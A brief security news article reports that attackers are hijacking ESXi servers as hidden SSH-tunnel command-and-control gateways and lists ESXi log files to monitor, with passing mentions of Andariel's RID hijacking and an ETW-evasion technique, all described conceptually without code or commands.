Stealthy Ransomware Hijacks ESXi Servers as Hidden Command Centers

Stealthy Ransomware Hijacks ESXi Servers as Hidden Command Centers

ESXi Systems Exploited as Stealthy Command-and-Control Gateways

Recent cybersecurity research has uncovered that threat actors are not only targeting ESXi systems with ransomware but are also repurposing them as covert tunnels for command-and-control (C2) operations. Sygnia researchers have identified that these typically unmonitored ESXi appliances are becoming prime targets for network persistence and unauthorized access.

Attackers gain initial access through either stolen admin credentials or known vulnerabilities, subsequently establishing SSH tunnels to maintain persistent network presence. The stability of ESXi systems, which rarely experience unexpected shutdowns, makes them ideal for maintaining long-term unauthorized access while evading detection.

Key Monitoring Points:
– Critical log files for detection:
* /var/log/shell.log
* /var/log/hostd.log
* /var/log/auth.log
* /var/log/vobd.log

Related Security Developments:
1. North Korean Andariel group has been observed using RID hijacking to elevate privileges of standard accounts by modifying Windows Registry entries.

2. A new hardware breakpoint-based technique has been discovered that can bypass Event Tracing for Windows (ETW) detections, utilizing NtContinue instead of SetThreadContext to avoid triggering security alerts.

These findings emphasize the growing sophistication of cyber attacks and the importance of comprehensive monitoring of virtualization infrastructure.

Share This Article